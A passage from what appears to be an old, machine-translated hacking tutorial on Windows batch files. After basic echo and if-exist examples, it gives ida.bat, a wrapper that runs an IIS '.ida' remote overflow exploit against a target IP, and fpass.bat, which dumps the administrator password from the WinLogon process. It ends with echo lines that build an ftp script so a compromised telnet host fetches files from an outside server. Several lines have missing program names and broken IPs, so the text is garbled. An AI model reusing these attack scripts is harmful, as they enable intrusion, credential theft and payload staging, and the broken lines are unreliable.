######################################################################
4. Simple batch file concept
######################################################################
echo This is test >
type
echo This is test 11111 >>
type
echo This is test 22222 >
type
The second echo is additional
The third echo will be cleared and recreated
netstat -n │ find "3389"
This will list all users connected to 3389.
________________test.bat___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem does not display comment statements, this line shows
@rem does not display comment statements, this line does not display
@if exist %windir%\system32\ (echo Find !!!) else (echo ERROR: Not find )
@if exist %windir%\system32\ (echo Find !!!) else (echo ERROR: Not find )
___________________________________________________________________________
Let's take the example of a specific iidahack program, iida remote overflow, as an example. It should be very simple.
___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\ echo "ERROR: dont find "
@if NOT exist %windir%\system32\ echo "ERROR: dont find "
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
%1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] "
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 %1 99
@goto END
:SP2
@ %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@if NOT errorlevel 1 %1 99
@goto END
:USAGE
@echo Example: IP
@echo Example: IP (2,3)
:END
_____________________ida.bat__END_________________________________
Let's go to the second file below. It is to get the administrator password.
Most people say they can't get it. In fact, they don't enter the correct information.
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\ echo "ERROR: dont find "
@if NOT exist %windir%\system32\ echo "ERROR: dont find "
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@ %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] "
@type %temp%\_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%\_findpass.txt
@goto END
:USAGE
@ >%temp%\_pass.txt
@ /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: %1 %2 %3 %4 !!!"
@echo "Usage: DomainName UserName PID-of-WinLogon"
:END
@echo " %COMPUTERNAME% %USERNAME% administrator "
@echo " end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________
Another one is that you have logged into a remote host through telnet. How to upload files (win)
Enter the following things in the window in turn. Of course, you can also copy them all.Ctrl+V. Then wait!!
echo open 210..4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get >>w
echo get >>w
echo get >>w
echo quit >>w
ftp -s:w